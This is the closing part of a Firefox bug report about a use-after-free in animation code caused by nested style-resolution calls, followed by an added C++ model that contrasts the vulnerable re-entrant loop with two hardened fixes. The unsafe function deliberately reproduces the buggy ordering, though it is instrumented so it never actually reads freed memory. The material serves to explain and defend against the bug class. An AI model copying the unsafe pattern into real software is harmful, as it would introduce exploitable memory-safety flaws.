  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==19899==ABORTING
Group: core-security → dom-core-security
Flags: needinfo?(bbirtles)
Redirecting to Hiro since he's been looking into this class of bugs recently (nested calls to GetContext) and has a patch for this in bug 1289701 (of which this is likely a dupe).
Flags: needinfo?(bbirtles) → needinfo?(hiikezoe)
That's right. Hidden documentElement and font style animation.
I just confirmed the patch for bug 1289701 fixed this.
Status: NEW → RESOLVED
Closed: 8 years ago
Flags: needinfo?(hiikezoe)
Resolution: --- → DUPLICATE
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty-
Group: dom-core-security
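The trace above and the comments explain the bug class: UpdateProperties assigns mProperties (freeing the old nsTArray buffer) and then calls CalculateCumulativeChangeHint, which iterates that array; style resolution inside the loop re-enters UpdateProperties through nsStyleSet::GetContext, the array is reassigned again, and the outer loop continues reading the buffer that the nested call just freed. The following C++ model of that pattern is an added example, not Gecko code and not the patch from bug 1289701. The Effect type, its onResolveStyle hook, the depth counter, the weak_ptr-based detection and the sample property values are all constructed for illustration; Gecko names are borrowed only for orientation.

```cpp
#include <cstddef>
#include <cstdio>
#include <functional>
#include <memory>
#include <utility>
#include <vector>

// Hypothetical stand-in for KeyframeEffectReadOnly. A shared_ptr plays the
// part of the heap buffer behind nsTArray so that a weak_ptr can observe the
// old buffer being released, which is what ASAN's shadow bytes reported.
struct Effect {
    std::shared_ptr<std::vector<int>> mProperties =
        std::make_shared<std::vector<int>>();
    // Stands in for the style-resolution path (nsStyleSet::GetContext ->
    // nsAnimationManager::UpdateAnimations) that re-entered UpdateProperties.
    std::function<void(Effect&)> onResolveStyle;
    int mUpdateDepth = 0;       // re-entrancy guard used by the hardened path
    int mBlockedReentries = 0;  // nested updates refused by the guard

    // Like the array assignment at KeyframeEffect.cpp:590: the previous
    // buffer is freed as soon as the new one is assigned.
    void UpdateProperties(std::vector<int> fresh) {
        mProperties = std::make_shared<std::vector<int>>(std::move(fresh));
    }

    // Unsafe pattern: remember the buffer, then call out while iterating.
    // Returns false at the point where the real code read freed memory
    // (KeyframeEffect.cpp:1504) instead of performing that read.
    bool CalculateCumulativeChangeHintUnsafe(int& hintOut) {
        std::weak_ptr<std::vector<int>> buffer = mProperties;  // no ownership
        const std::size_t n = mProperties->size();
        hintOut = 0;
        for (std::size_t i = 0; i < n; ++i) {
            if (onResolveStyle) onResolveStyle(*this);  // may re-enter
            std::shared_ptr<std::vector<int>> live = buffer.lock();
            if (!live) return false;  // old buffer is gone: this is the UAF
            hintOut += (*live)[i];
        }
        return true;
    }

    // Hardened pattern: hold a strong reference to the buffer being iterated,
    // so nothing a callee does can free it under the loop.
    int CalculateCumulativeChangeHintSafe() {
        std::shared_ptr<std::vector<int>> snapshot = mProperties;
        int hint = 0;
        for (std::size_t i = 0; i < snapshot->size(); ++i) {
            if (onResolveStyle) onResolveStyle(*this);
            hint += (*snapshot)[i];
        }
        return hint;
    }

    // Second layer: refuse nested updates while one is in flight.
    // Returns the change hint, or -1 when the call was a refused re-entry.
    int UpdatePropertiesGuarded(std::vector<int> fresh) {
        if (mUpdateDepth > 0) { ++mBlockedReentries; return -1; }
        ++mUpdateDepth;
        mProperties = std::make_shared<std::vector<int>>(std::move(fresh));
        int hint = CalculateCumulativeChangeHintSafe();
        --mUpdateDepth;
        return hint;
    }
};

// Scenario from the trace: the style hook re-enters UpdateProperties.
// Returns true when the unsafe loop finds its buffer already freed.
bool UnsafeLoopHitsFreedBuffer() {
    Effect e;
    e.onResolveStyle = [](Effect& self) { self.UpdateProperties({7, 8, 9}); };
    e.UpdateProperties({1, 2, 3});
    int hint = 0;
    return !e.CalculateCumulativeChangeHintUnsafe(hint);
}

// Same scenario against the hardened path: the loop finishes over the
// snapshot ({1,2,3} -> 6) and every nested update is refused (one per element).
int HardenedLoopResult(int* blockedOut) {
    Effect e;
    e.onResolveStyle = [](Effect& self) { self.UpdatePropertiesGuarded({7, 8, 9}); };
    int hint = e.UpdatePropertiesGuarded({1, 2, 3});
    *blockedOut = e.mBlockedReentries;
    return hint;
}

int main() {
    int blocked = 0;
    std::printf("unsafe loop hit freed buffer: %s\n",
                UnsafeLoopHitsFreedBuffer() ? "yes" : "no");
    std::printf("hardened hint=%d, nested updates refused=%d\n",
                HardenedLoopResult(&blocked), blocked);
    return 0;
}
```

The two layers are independent mitigations: keeping the iterated buffer alive removes the dangling read even if re-entry still happens, and the depth guard removes the re-entry itself, which is the shape of fix the comments describe for nested GetContext calls. In a real code base the guard also needs a policy for the refused update (ignore it, as here, or queue it for after the outer call returns); the weak_ptr check exists only to make the unsafe ordering observable without actually touching freed memory.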